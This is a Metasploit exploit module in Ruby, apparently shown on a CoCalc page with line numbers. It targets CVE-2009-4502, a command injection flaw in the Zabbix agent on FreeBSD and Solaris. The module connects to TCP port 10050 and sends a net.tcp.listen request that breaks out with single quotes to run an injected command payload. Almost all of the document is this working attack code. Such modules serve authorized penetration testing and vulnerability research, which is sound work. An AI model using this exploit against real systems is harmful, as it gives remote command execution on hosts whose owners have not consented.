CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Zabbix Agent net.tcp.listen Command Injection',
14
      'Description'    => %q{
15
          This module exploits a metacharacter injection vulnerability
16
        in the FreeBSD and Solaris versions of the Zabbix agent. This flaw
17
        can only be exploited if the attacker can hijack the IP address
18
        of an authorized server (as defined in the configuration file).
19
      },
20
      'Author'         => [ 'hdm' ],
21
      'License'        => MSF_LICENSE,
22
      'References'     =>
23
        [
24
          [ 'CVE', '2009-4502' ],
25
          [ 'OSVDB', '60956' ],
26
          [ 'URL', 'https://support.zabbix.com/browse/ZBX-1032'],
27
        ],
28
      'Platform'       => ['unix'],
29
      'Arch'           => ARCH_CMD,
30
      'Privileged'     => false,
31
      'Payload'        =>
32
        {
33
          'BadChars'    => "'",
34
          'Space'       => 1024,
35
          'DisableNops' => true,
36
          'Compat'      =>
37
            {
38
              'PayloadType' => 'cmd',
39
              'RequiredCmd' => 'generic perl telnet',
40
            }
41
        },
42
      'Targets'        =>
43
        [
44
          [ 'Automatic Target', { }]
45
        ],
46
      'DefaultTarget'  => 0,
47
      'DisclosureDate' => '2009-09-10'))
48

49
    register_options(
50
      [
51
        Opt::RPORT(10050)
52
      ])
53
  end
54

55
  def exploit
56
    connect
57

58
    rnd_port = rand(1024) + 1
59
    buf = "net.tcp.listen[#{rnd_port}';#{payload.encoded};']\n"
60

61
    print_status("Sending net.tcp.listen() request to the zabbix agent...")
62
    sock.put(buf)
63

64
    res = nil
65
    begin
66
      res = sock.get_once(-1, 5)
67
    rescue ::EOFError
68
    end
69

70
    if ! res
71
      print_status("The zabbix agent did not reply, our IP must not be in the allowed server list.")
72
      disconnect
73
      return
74
    end
75

76
    if (res =~ /ZBX_NOTSUPPORTED/)
77
      print_status("The zabbix agent is not running a vulnerable version or operating system.")
78
      disconnect
79
      return
80
    end
81

82
    if(res !~ /ZBXD/)
83
      print_status("The zabbix agent returned an unknown response.")
84
      disconnect
85
      return
86
    end
87

88
    print_status("The zabbix agent should have executed our command.")
89
    disconnect
90
  end
91
end
92

93